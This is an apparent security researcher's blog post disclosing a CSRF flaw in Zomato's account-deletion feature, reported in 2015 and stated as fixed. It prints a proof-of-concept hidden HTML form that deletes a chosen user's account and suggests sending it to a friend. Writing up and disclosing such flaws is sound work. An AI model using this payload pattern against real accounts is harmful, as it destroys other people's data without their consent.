How i deleted your zomato account !

Hi friends 😀 ,

Zomato is an online restaurant search and discovery service providing information on home delivery, dining-out, cafés and nightlife for various cities of India and 21 other countries. It has 62.5 million registered users.

I was catched by it so i was messing around with zomato now while checking out the settings section i found the “delete my account ” option and after clicking on that a prompt will occur like this

  zomato hack

Now to delete the account you have to type delete inside it and confirm ! but their was a flaw their was no csrf token available to validate the request ! .

What is CSRF TOKEN ?
CSRF token is a protective measure used to prevent cross site request forgery attacks which checks that the request is coming from the legitimate user or not !

Now Exploitation Part 
i created a quick working code which allows you to delete the any user’s account so now to delete his or her account you just need send this code via html  or as a link . 😛

Code ?
<form action=” method=”POST”>

<input type=”hidden” name=”reason” value=”woot woot”>

<input type=”hidden” name=”userid” value=”[User ID to whom you wanna delete]”>

<input type=”submit”  value=”Submit request”>



Video Poc :
save this as delete.html and send this to your friend !

Exploitability ?

it was easy to grab any user  ==>userid by just visiting their profile and copy that user id .Which increased it severity 😉

[+] Fixing Time line

[+] July 21, 2015 Reported to CEO (Report sent to Deepinder Goyal) ,CTO
[+] July 21, 2015 Reported to Support team
[+] Bug Fixed by team .

Let #internet be #safer place 🙂


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s